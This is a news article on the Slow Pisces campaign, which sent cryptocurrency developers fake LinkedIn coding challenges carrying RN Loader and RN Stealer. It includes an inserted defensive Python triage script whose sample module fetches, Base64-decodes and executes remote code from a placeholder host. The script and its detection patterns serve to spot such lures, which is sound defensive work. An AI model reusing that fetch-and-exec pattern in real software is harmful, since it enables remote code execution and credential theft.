The North Korea-linked hacking group, Slow Pisces, has been targeting cryptocurrency developers with malware disguised as coding challenges. Researchers from Palo Alto Networks Unit 42 have attributed this new malicious campaign to the threat actor, which is also referred to as Jade Sleet, PUKCHONG, TraderTraitor, and UNC4899. Security researcher Prashil Pattni said, “Slow Pisces engaged with cryptocurrency developers on LinkedIn, posing as potential employers and sending malware disguised as coding challenges.
These challenges require developers to run a compromised project, infecting their systems using malware we have named RN Loader and RN Stealer.”
The campaign follows a multi-stage attack chain. First, Slow Pisces sends targets a benign PDF document with a job description. If interested, the developers receive a skills questionnaire with instructions to download a trojanized Python project from GitHub.
While the project appears capable of viewing cryptocurrency prices, it is actually designed to contact a remote server and fetch an additional payload. Slow Pisces employs a targeted approach, sending the malicious payload only to validated targets based on specific criteria such as IP address, geolocation, and HTTP request headers. This method has allowed the campaign to persist without significant changes over time.
Cryptocurrency developers targeted on LinkedIn
Andy Piazza, Senior Director of Threat Intelligence at Palo Alto Networks Unit 42, noted, “Before the Bybit hack, there was very little detailed awareness and reporting of the campaign in open source. The campaign has continually updated its OPSEC on sites like GitHub, varying the lures used and how payloads can be executed.”
The malware, RN Loader, sends the command-and-control server basic information about the victim’s machine and operating system.
In return, it receives a Base64-encoded blob containing RN Stealer, an information stealer capable of harvesting sensitive data from Apple macOS systems. This includes system metadata, installed applications, iCloud Keychain, stored SSH keys, and configuration files for cloud services. Pattni explained, “Focusing on individuals contacted via LinkedIn, as opposed to broad phishing campaigns, allows the group to tightly control the later stages of the campaign and deliver payloads only to expected victims.” This approach helps conceal the execution of arbitrary code from the command-and-control servers.
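As an added illustration (not code from Unit 42 or from the campaign), the following static triage check is the kind of thing a developer or reviewer could run over a "coding challenge" repository before executing it: it flags Python modules in which exec/eval co-occurs with a remote fetch or a Base64 decode, the fetch-decode-execute pattern described above. The call-name lists and the two sample modules are constructed assumptions, not artifacts from the campaign.

```python
import ast

# Dotted call names marking the three stages the article describes: contact a
# remote server, decode a Base64 blob, execute the result in memory.
FETCH_CALLS = {"requests.get", "requests.post", "urllib.request.urlopen",
               "urlopen", "httpx.get", "httpx.post"}
DECODE_CALLS = {"base64.b64decode", "b64decode", "base64.b85decode", "b85decode"}
EXEC_CALLS = {"exec", "eval"}

# Constructed samples (not code from the campaign): a "price viewer" that fetches,
# decodes and executes a blob, and one that only downloads and prints JSON.
SUSPICIOUS_SAMPLE = """
import base64, requests
def show_prices():
    r = requests.get("https://example.invalid/prices")
    exec(base64.b64decode(r.json()["data"]))
"""
BENIGN_SAMPLE = """
import requests
def show_prices():
    r = requests.get("https://example.invalid/prices")
    print(r.json()["BTC"])
"""

def _dotted(node):
    """Render a call target as a dotted name: `requests.get`, `exec`, or None."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None

def triage_python_source(source, filename="<input>"):
    """Locate fetch, decode and dynamic-execution calls in a Python module.

    Returns the line numbers of each stage plus a `suspicious` flag that is set
    only when exec/eval co-occurs with a fetch or a decode, so a viewer that
    merely downloads JSON is not flagged."""
    hits = {"fetch": [], "decode": [], "exec": []}
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        for stage, names in (("fetch", FETCH_CALLS), ("decode", DECODE_CALLS),
                             ("exec", EXEC_CALLS)):
            if name in names:
                hits[stage].append(node.lineno)
    suspicious = bool(hits["exec"]) and bool(hits["fetch"] or hits["decode"])
    return {"file": filename, "suspicious": suspicious, **hits}
```

Run it over every `.py` file in a candidate repository before installing or executing anything; a hit is a reason to read the flagged lines, not proof of malice.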
The recurrence of developer-oriented campaigns, particularly targeting those with access to valuable cryptocurrency, underscores their effectiveness. Slow Pisces stands out for its operational security, deploying later-stage tooling only when necessary and ensuring payloads are heavily guarded and exist solely in memory. Palo Alto Networks Unit 42 emphasizes the importance of awareness and vigilance among developers, especially those working in high-value sectors like cryptocurrency.
The cybersecurity community continues to monitor and analyze these sophisticated campaigns to mitigate the associated risks.
Source: DevX.com / Digpu NewsTex